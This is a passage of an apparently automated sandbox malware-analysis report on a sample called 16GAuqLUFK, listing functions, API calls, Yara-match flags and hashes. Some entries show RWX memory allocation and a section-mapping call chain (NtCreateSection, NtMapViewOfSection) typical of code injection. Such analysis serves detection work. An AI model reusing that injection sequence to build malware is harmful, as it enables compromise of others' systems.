VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 004D024D

Strings

cess, xrefs: 004D018D
kernel32.dll, xrefs: 004D008F, 004D0095

Memory Dump Source

Source File: 00000000.00000002.2042153672.00000000004D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_16GAuqLUFK.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 5a4eb5335b9017b72995064155e02981a5691e6df516f36f8e83627a784eeccd
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 50526974A01229DFDB64CF58C994BA8BBB1BF09304F1480DAE90DAB351DB34AE85DF15

Uniqueness

Uniqueness Score: -1.00%

Function 0040B58C Relevance: 4.5, APIs: 3, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0040B58F
__malloc_crt.LIBCMT ref: 0040B5BD
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0040B5CA

Memory Dump Source

Source File: 00000000.00000002.2041895461.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_16GAuqLUFK.jbxd

Similarity

API ID: EnvironmentStrings$Free__malloc_crt
String ID:
API String ID: 237123855-0
Opcode ID: 49a2fb1b83c9f16244455367d635a3000e5460d0a6a54381166d35ac42f94b96
Instruction ID: 6bd679a971a5abfdfcbbb794cf7a15b017c42389b36ed99d7de3d20cbfc2f99c
Opcode Fuzzy Hash: 49a2fb1b83c9f16244455367d635a3000e5460d0a6a54381166d35ac42f94b96
Instruction Fuzzy Hash: 39F0E227901020AECA217A357C8887B1229DAC732D31544BBF452F3381FB384D8783EC

Uniqueness

Uniqueness Score: -1.00%

Function 004D0E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,004D0223,?,?), ref: 004D0E19
SetErrorMode.KERNELBASE(00000000,?,?,004D0223,?,?), ref: 004D0E1E

Memory Dump Source

Source File: 00000000.00000002.2042153672.00000000004D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_16GAuqLUFK.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: cb069858c9b6a2e2d7e13c14fd3da84f7aedd7383e250c1659108a2ed55fba54
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: DDD0123114512877D7002A94DC09BCE7B1CDF05B62F008412FB0DD9180C774994046E9

Uniqueness

Uniqueness Score: -1.00%

Function 004029C5 Relevance: 1.6, APIs: 1, Instructions: 55
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18

Memory Dump Source

Source File: 00000000.00000002.2041818835.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_16GAuqLUFK.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 630f67e63f4c9d6cadc1f4ef28869250e9dd95ac73f78134dda1cef590dfe083
Instruction ID: eda82e36109819710fc28ef01b941f30aa1b457bd77d6c907d6690057fca41fa
Opcode Fuzzy Hash: 630f67e63f4c9d6cadc1f4ef28869250e9dd95ac73f78134dda1cef590dfe083
Instruction Fuzzy Hash: 3C01C471708205E7DA60DA949A4EB6B7710AB51B10F308077E5037A1C4DAFD9A07FB6B

Uniqueness

Uniqueness Score: -1.00%

Function 004029D1 Relevance: 1.6, APIs: 1, Instructions: 54
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18

Memory Dump Source

Source File: 00000000.00000002.2041818835.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_16GAuqLUFK.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 8aebd7c2dfb35844096bdf04bcf18f9291abc38b44631a4f8f553a04b448b611
Instruction ID: 27f311fed6bd4bb195386d6e886048742e5b6b48a655c0a394e70793ed6bf28f
Opcode Fuzzy Hash: 8aebd7c2dfb35844096bdf04bcf18f9291abc38b44631a4f8f553a04b448b611
Instruction Fuzzy Hash: E0018071708105E7DA609A449B4EB6B7324BB50B10F308477E5077A1C4DAFD9A07BB6F

Uniqueness

Uniqueness Score: -1.00%

Function 004029D5 Relevance: 1.6, APIs: 1, Instructions: 51
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18

Memory Dump Source

Source File: 00000000.00000002.2041818835.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_16GAuqLUFK.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 14f9d75437b26c4e33ab762a249f6d4a6897a4cf10a17b4738070ea496484bd2
Instruction ID: 6c082c2f6db60d75b034223dafbed04b71575a1e0537fab93527f59567f6cb96
Opcode Fuzzy Hash: 14f9d75437b26c4e33ab762a249f6d4a6897a4cf10a17b4738070ea496484bd2
Instruction Fuzzy Hash: DB01B531708105E7DB60DA409A4DF5F7720BB50B10F208577E5077A1C4DAF99A17EB9B

Uniqueness

Uniqueness Score: -1.00%

Function 004029E2 Relevance: 1.5, APIs: 1, Instructions: 47
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18

Memory Dump Source

Source File: 00000000.00000002.2041818835.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_16GAuqLUFK.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: b2d371f82e3e545a267ab12f2e2f0a58ec4b54f775fd64736b106f9591d7a7c3
Instruction ID: daf8977218c418413866257df5c9087131837fd98e0c4230724de407841e0162
Opcode Fuzzy Hash: b2d371f82e3e545a267ab12f2e2f0a58ec4b54f775fd64736b106f9591d7a7c3
Instruction Fuzzy Hash: 3801DF31708104E7DB209A848A4DB5E7320AB40B10F208577E507BA1C0DAF9AA07AFAB

Uniqueness

Uniqueness Score: -1.00%

Function 004029E9 Relevance: 1.5, APIs: 1, Instructions: 47libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18

Memory Dump Source

Source File: 00000000.00000002.2041818835.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_16GAuqLUFK.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 9850a57f899f03cbeedeed8d531e786c982b6ed5f0a372be87f463e87495e5bd
Instruction ID: 5524fd7572365f35614fa46947343296b9db081daee3b4d0816b59f029c0b045
Opcode Fuzzy Hash: 9850a57f899f03cbeedeed8d531e786c982b6ed5f0a372be87f463e87495e5bd
Instruction Fuzzy Hash: 2101A731704104E7D7209A448A4EB5E7720AB40704F208477E5067A1C4DAB9EA07AB6B

Uniqueness

Uniqueness Score: -1.00%

Function 004029F9 Relevance: 1.5, APIs: 1, Instructions: 45libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18

Memory Dump Source

Source File: 00000000.00000002.2041818835.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_16GAuqLUFK.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 83fdb88ab79b739a001a2e8c05ea2e4136fbf27434a3016a2f3de2c8c28590ed
Instruction ID: 2a527b723104a8d4642483acce18f9de5ed6d5a74c4e47f32731208c7d716ef4
Opcode Fuzzy Hash: 83fdb88ab79b739a001a2e8c05ea2e4136fbf27434a3016a2f3de2c8c28590ed
Instruction Fuzzy Hash: 1801A231708104E7DB209A849A4DF9F7720AB40B14F208477E5027A1C0DAF9AA07AFAB

Uniqueness

Uniqueness Score: -1.00%

Function 0040B88F Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040B8A4

Memory Dump Source

Source File: 00000000.00000002.2041895461.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_16GAuqLUFK.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 4f7bdf0ae3454506b509a1ba1156470ae560eb85cef37f106d5e2167d2b54d3a
Instruction ID: fdd9072dd51a5094af8bbff14792c3c9a5398ed967f64e294984340f0ffe5b81
Opcode Fuzzy Hash: 4f7bdf0ae3454506b509a1ba1156470ae560eb85cef37f106d5e2167d2b54d3a
Instruction Fuzzy Hash: B4D05E32650305AAEB115F70BC09B623BDCE384795F108436F80CC6290EA74C9418648

Uniqueness

Uniqueness Score: -1.00%

Function 004277F0 Relevance: 1.5, APIs: 1, Instructions: 17libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(00436E88,00427DED), ref: 00427847

Memory Dump Source

Source File: 00000000.00000002.2041895461.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_16GAuqLUFK.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 5803b48f5093d0cfe576ee4fc49deb77592ce8e88f377515dbd01f1aa6bf59b7
Instruction ID: 173666087734f2a877f1f27f9b460ac686da6e907cf0fc04bde460f021aa7383
Opcode Fuzzy Hash: 5803b48f5093d0cfe576ee4fc49deb77592ce8e88f377515dbd01f1aa6bf59b7
Instruction Fuzzy Hash: C3F04C0D54D2C2EDD7028B68F85B7413E911723E48F5AF1A9C0880B2A3C2EE911DE77E

Uniqueness

Uniqueness Score: -1.00%

Function 00401969 Relevance: 1.3, APIs: 1, Instructions: 62sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 004019B4

Part of subcall function 00401590: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
Part of subcall function 00401590: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
Part of subcall function 00401590: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698

Memory Dump Source

Source File: 00000000.00000002.2041818835.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_16GAuqLUFK.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: b8285f967374eae4a3c51efe3ce59b098afe428af0dcb557450618fb68c9c18d
Instruction ID: 1276e484f00ba66cbffb4616bb4d5d076efec51046982770477825c9afbd6400
Opcode Fuzzy Hash: b8285f967374eae4a3c51efe3ce59b098afe428af0dcb557450618fb68c9c18d
Instruction Fuzzy Hash: 0F01D2B6708205FADB005A949C62EBB3618AB41755F300637BA13B80F1C57D8513FA6F

Uniqueness

Uniqueness Score: -1.00%

Function 00401975 Relevance: 1.3, APIs: 1, Instructions: 55sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 004019B4

Part of subcall function 00401590: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
Part of subcall function 00401590: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
Part of subcall function 00401590: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698

Memory Dump Source

Source File: 00000000.00000002.2041818835.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_16GAuqLUFK.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 9a4c6db62cce5b151e284cc19e63a433146ff3755d8681b35f1a2b6972971a8e
Instruction ID: 0230620869f43b82b90ed4dddf49477c9f5c6c73dade890abd4ec4b7d4a8195a
Opcode Fuzzy Hash: 9a4c6db62cce5b151e284cc19e63a433146ff3755d8681b35f1a2b6972971a8e
Instruction Fuzzy Hash: 4801BCB6308205FADB005A949C62FBA3219AB84751F30053BB613BC0F1C53D8513FA2F

Uniqueness

Uniqueness Score: -1.00%

Function 0040197F Relevance: 1.3, APIs: 1, Instructions: 54sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 004019B4

Part of subcall function 00401590: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
Part of subcall function 00401590: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
Part of subcall function 00401590: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698

Memory Dump Source

Source File: 00000000.00000002.2041818835.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_16GAuqLUFK.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 25088a1f844088f741a859eeb607afc94706ffd20a91742bc3d9f24c23efa0b5
Instruction ID: 9a4b4ffd5ca22a672d673467c452b15ea5c40039b4ea8ded510267d200494456
Opcode Fuzzy Hash: 25088a1f844088f741a859eeb607afc94706ffd20a91742bc3d9f24c23efa0b5
Instruction Fuzzy Hash: 3A01B1B6308205FADB115A949C61A7A3319AB45711F30053BB613B80F2C53D8512FA1F

Uniqueness

Uniqueness Score: -1.00%

Function 00401986 Relevance: 1.3, APIs: 1, Instructions: 53sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 004019B4

Part of subcall function 00401590: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
Part of subcall function 00401590: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
Part of subcall function 00401590: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698

Memory Dump Source

Source File: 00000000.00000002.2041818835.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_16GAuqLUFK.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: f146987f8c0bf49c3ef7592727f3e0a51ae856d021a330616d03f7304a9c3b71
Instruction ID: 5a2bb716a64f0a1f1a6e426f0b200f3e6862a670896c4db1e76ea4af0659c5ba
Opcode Fuzzy Hash: f146987f8c0bf49c3ef7592727f3e0a51ae856d021a330616d03f7304a9c3b71
Instruction Fuzzy Hash: 3101DFB2308205FADB005AD49C62F7A3219AB85715F30453BB623B80F1C63D8512FB2F

Uniqueness

Uniqueness Score: -1.00%

Function 0050DE85 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0050DED6

Memory Dump Source

Source File: 00000000.00000002.2042284755.000000000050D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0050D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_50d000_16GAuqLUFK.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: bbcd4659af3a3df8eed63c0ed3332eb384c6923651b0a9f3c22f1d148af65ed6
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 95112B79A00208EFDB01DF98C985E98BFF5AF08350F158094F9489B362D371EA50EF94

Uniqueness

Uniqueness Score: -1.00%

Function 004019A2 Relevance: 1.3, APIs: 1, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 004019B4

Part of subcall function 00401590: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
Part of subcall function 00401590: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
Part of subcall function 00401590: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698

Memory Dump Source

Source File: 00000000.00000002.2041818835.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_16GAuqLUFK.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: a8f77c5b0aafc3a83b6e9a89fc0125d54fce9978fbcf9d902b8238b221feffd7
Instruction ID: 689da8ed0bf63c85a60a16fbbe407e4b0918199af58fa2149c0a58fdfe32668e
Opcode Fuzzy Hash: a8f77c5b0aafc3a83b6e9a89fc0125d54fce9978fbcf9d902b8238b221feffd7
Instruction Fuzzy Hash: 0E0181B6308105FADB115AD49D52FBA3719AB45751F30453BB613B80F2C53D8512FB2B

Uniqueness

Uniqueness Score: -1.00%

Function 00401992 Relevance: 1.3, APIs: 1, Instructions: 46sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 004019B4

Part of subcall function 00401590: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
Part of subcall function 00401590: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
Part of subcall function 00401590: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698

Memory Dump Source

Source File: 00000000.00000002.2041818835.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_16GAuqLUFK.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 994369af4d0fa0c447a21c659804c9e18bb6abd6db9e85dcf8f049b878b9c4ba
Instruction ID: 9477092311c163758adf26378a137d016a4cc75b4861da4fd192d9fcf75081b0
Opcode Fuzzy Hash: 994369af4d0fa0c447a21c659804c9e18bb6abd6db9e85dcf8f049b878b9c4ba
Instruction Fuzzy Hash: 25016D72304105FADB119AD09C52EAA3729AB48355F30457BB613BD0F2C63D8552EB2B

Uniqueness

Uniqueness Score: -1.00%

Function 00426F00 Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNELBASE(00000000,00438678,00427D84), ref: 00426F08

Memory Dump Source

Source File: 00000000.00000002.2041895461.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_16GAuqLUFK.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 95aeb62281ebf6d2b42ebdf5bf64688477fc6f5a305bb7d344a972c2b6fe489f
Instruction ID: 13bf4b108252158a75ec77be3b4ce55021fb3416f1f265c46b69e859f922f5fe
Opcode Fuzzy Hash: 95aeb62281ebf6d2b42ebdf5bf64688477fc6f5a305bb7d344a972c2b6fe489f
Instruction Fuzzy Hash: CCB092B0206200ABE3008B60AC05B1476F4A304202F0060A5BD00C2160CA300800EF28

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00427AC0 Relevance: 45.8, APIs: 23, Strings: 3, Instructions: 294timeCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00427B0A
GetAtomNameA.KERNEL32(00000000,?,00000000), ref: 00427B5B
DeviceIoControl.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?), ref: 00427B9B
SetDefaultCommConfigW.KERNEL32(00431F04,?,00000000), ref: 00427BC6
CopyFileExA.KERNEL32(00431F54,00431F34,00000000,00000000,00000000,00000000), ref: 00427BDA
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00427BE1
AddAtomW.KERNEL32(00000000), ref: 00427BE8
GetCurrentDirectoryW.KERNEL32(00000000,?), ref: 00427BF6
GetModuleHandleA.KERNEL32(00000000), ref: 00427BFD
LocalLock.KERNEL32(00000000), ref: 00427C04
GetProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00427C18
GetEnvironmentVariableW.KERNEL32(00000000,?,00000000), ref: 00427C27
QueryMemoryResourceNotification.KERNEL32(00000000,00000000), ref: 00427C38
GetConsoleAliasExesLengthW.KERNEL32 ref: 00427C72
SetTapeParameters.KERNEL32(00000000,00000000,00000000), ref: 00427C7B
IsDBCSLeadByte.KERNEL32(00000000), ref: 00427C82
GetTempFileNameW.KERNEL32(00000000,00000000,00000000,?), ref: 00427C92
MoveFileExW.KERNEL32(00000000,00000000,00000000), ref: 00427C9B
OpenWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 00427CA4
GetLongPathNameW.KERNEL32(00431F80,?,00000000), ref: 00427CC5
GetCompressedFileSizeW.KERNEL32(00000000,?), ref: 00427D74
GetPrivateObjectSecurity.ADVAPI32(00000000,00000000,00000000,00000000,00000000), ref: 00427DD7
GetAtomNameA.KERNEL32(00000000,00000000,00000000), ref: 00427EA6

Strings

_GA, xrefs: 00427B27
0, xrefs: 00427D1D
tl_, xrefs: 00427B3E

Memory Dump Source

Source File: 00000000.00000002.2041895461.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_16GAuqLUFK.jbxd

Similarity

API ID: FileName$Atom$Environment$AliasByteCommCompressedConfigConsoleControlCopyCurrentDefaultDeviceDirectoryErrorExesFreeHandleLastLeadLengthLocalLockLongMemoryModuleMoveNotificationObjectOpenParametersPathPrivateProfileQueryResourceSecuritySizeStringStringsTapeTempTimerVariableWaitable
String ID: 0$_GA$tl_
API String ID: 3429075307-1499724424
Opcode ID: c17647f3030d1a0ec08f1ea443105fe2cdf6afe921ad95357a6e98b8f81be8ef
Instruction ID: ab75bdf11779803d0565b6fc8615a4576ecaf644103de126a006e2dafc9e6c1a
Opcode Fuzzy Hash: c17647f3030d1a0ec08f1ea443105fe2cdf6afe921ad95357a6e98b8f81be8ef
Instruction Fuzzy Hash: 35A1C471945234ABD724AB61EC49FDF7B78EF09300F5011AAF609A2160DB785A84CFED

Uniqueness

Uniqueness Score: -1.00%

Function 0040B002 Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

___crtGetLocaleInfoA.LIBCMT ref: 0040B008

Part of subcall function 004141F8: __crtGetLocaleInfoA_stat.LIBCMT ref: 0041421E

__calloc_crt.LIBCMT ref: 0040B01F

Part of subcall function 0040DEAD: Sleep.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?,?,?,00414F5F,?), ref: 0040DED5

___crtGetLocaleInfoA.LIBCMT ref: 0040B046
__calloc_crt.LIBCMT ref: 0040B057

Memory Dump Source

Source File: 00000000.00000002.2041895461.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_16GAuqLUFK.jbxd

Similarity

API ID: InfoLocale$___crt__calloc_crt$A_statSleep__crt
String ID:
API String ID: 3930424623-0
Opcode ID: 74bc9507c8cb048b3ebad0d035873e2c13d5b6b55a10a927cd7a68798c37a7e9
Instruction ID: da013b7990cd12b2b2fed16e94f1a8d8ec23990b9b41d735504debc0907463ae
Opcode Fuzzy Hash: 74bc9507c8cb048b3ebad0d035873e2c13d5b6b55a10a927cd7a68798c37a7e9
Instruction Fuzzy Hash: 2111B172D00161AACB306A759C85EAF7664EB40324F1404BFF829B21C1EF394D809AE8

Uniqueness

Uniqueness Score: -1.00%

Function 0040B0BE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

___crtGetLocaleInfoW.LIBCMT ref: 0040B0D3

Part of subcall function 0041404F: GetLocaleInfoW.KERNEL32(?,?,?,?), ref: 0041406E

Strings

$kC, xrefs: 0040B0C6
,kC, xrefs: 0040B0FD

Memory Dump Source

Source File: 00000000.00000002.2041895461.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_16GAuqLUFK.jbxd

Similarity

API ID: InfoLocale$___crt
String ID: $kC$,kC
API String ID: 286810668-2888120922
Opcode ID: 01fa62280c33394c783d4b58ad770659c06a501501e929fcd6b05787c8eb49b9
Instruction ID: 700de6bd536e460a1f440345a4f9dc536f1fd7a77c6785d7c963a20f5fb316f8
Opcode Fuzzy Hash: 01fa62280c33394c783d4b58ad770659c06a501501e929fcd6b05787c8eb49b9
Instruction Fuzzy Hash: 31F04621644182AACB101E355C218ABBB45CB89314B24547FE5A1A32C2C73EC841C7AD

Uniqueness

Uniqueness Score: -1.00%

Function 004D092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

GetProcAddress., xrefs: 004D09DC, 004D09DF, 004D09E4
., xrefs: 004D095F
l, xrefs: 004D0966

Memory Dump Source

Source File: 00000000.00000002.2042153672.00000000004D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_16GAuqLUFK.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: 3016ce05ce8855db380bad6eded173ec707f94a4e12e42bac316a148406dd603
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: 963117B6900609DFDB10CF99C890BAEBBF5FB48324F25408BD441A7351D775AA45CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00427850 Relevance: 3.0, APIs: 2, Instructions: 32COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00427880
LoadResource.KERNEL32(00000000,00000000), ref: 004278BA

Memory Dump Source

Source File: 00000000.00000002.2041895461.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_16GAuqLUFK.jbxd

Similarity

API ID: FileLoadModuleNameResource
String ID:
API String ID: 709042578-0
Opcode ID: f676781c4fba02838801dc18f2cd26b2657b8a29837a0f44a8f2100d399e7564
Instruction ID: 0235000bfe6c8e39d23654c370a6eed1c415f68978146e8661e0c2132433831a
Opcode Fuzzy Hash: f676781c4fba02838801dc18f2cd26b2657b8a29837a0f44a8f2100d399e7564
Instruction Fuzzy Hash: 9B01AFB1608300DBE328AB24ED46BA677E4EB48700F00243EFA85972D0CB385844CB5E

Uniqueness

Uniqueness Score: -1.00%

Function 00417676 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

EnumSystemLocalesA.KERNEL32(Function_0000C2D5,00000001), ref: 0041768F

Memory Dump Source

Source File: 00000000.00000002.2041895461.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_16GAuqLUFK.jbxd

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 6ca32cdf93b1e4469b6275d5e289ac1cc41d2896c6b0d3dbe36aac65aa9808a5
Instruction ID: b066f63956ce9bbe508c2e277e2343e3bb697833093e92075d6e43e46e7d00e5
